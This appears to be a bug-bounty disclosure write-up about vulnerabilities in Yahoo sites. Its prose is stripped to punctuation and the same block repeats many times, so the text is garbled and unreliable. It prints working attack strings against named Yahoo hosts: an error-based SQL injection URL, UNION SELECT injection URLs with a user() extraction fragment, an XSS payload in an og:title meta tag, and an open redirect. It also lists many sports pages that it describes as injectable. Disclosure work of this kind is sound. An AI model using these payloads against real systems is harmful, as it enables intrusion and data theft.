http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
